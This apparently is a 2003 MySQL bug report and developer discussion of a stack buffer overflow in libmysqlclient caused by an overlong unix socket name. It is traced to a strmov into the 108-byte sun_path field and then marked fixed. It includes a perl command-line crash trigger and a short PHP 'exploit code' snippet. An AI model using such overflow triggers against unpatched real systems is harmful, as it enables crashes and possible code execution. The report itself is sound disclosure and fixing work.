Description:
We just found minor security bug in libmysqlclient. It is in mysql_real_connect 
function from libmysql.c . This bug can easily produce by supplying socket name > 250. It is stack base bufferoveflow where user can easily overwrite eip. 

ex:
 mysql -S `perl -e 'print "a" x 256'` -hlocalhost

This bug have succesfully test on safe_mode php (without command execution allow) in our latest geeklog bug (where user can upload *.php file)
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0092.html

------exploit code -------------------
<?php
    for ($i;$i<256;$i++)
    	$buff .= "A";
    ini_set("mysql.default_socket","$buff");
    mysql_connect("localhost", "root", "1234")
    
?>
--------------------------------------

Regard,

pokleyzz@scan-associates.net
http://www.scan-associates.net

How to repeat:
i) mysql -S `perl -e 'print "a" x 256'` -hlocalhost

ii)
------exploit code -------------------
<?php
    for ($i;$i<256;$i++)
    	$buff .= "A";
    ini_set("mysql.default_socket","$buff");
    mysql_connect("localhost", "root", "1234")
    
?>
--------------------------------------

Jani, can you please have a look at this soon? Thanks!

BTW: I could not initally reproduce it with the provided Perl String (using 256 chars). I needed 322 chars 
to make it segfault in the standard 3.23.56 and 4.0.13 distribution.

I think the problem is an buffer overflow in structure UNIX_addr:

-> strmov(UNIXaddr.sun_path, unix_socket);

sun_path is defined in sys/un.h:

/* Structure describing the address of an AF_LOCAL (aka AF_UNIX) socket.  */
struct sockaddr_un
  {
    __SOCKADDR_COMMON (sun_);
    char sun_path[108];		/* Path name.  */
  };

Georg

Fixed. Will be in 4.0 and 4.1 soon.
Regards,
Jani

If you believe that you are vulnerable to this you should upgrade to 4.1 for a full fix, not stick to 4.0. You aren't vulnerable with any version if your server is running on Windows or any other platform that doesn't support unix-style sockets.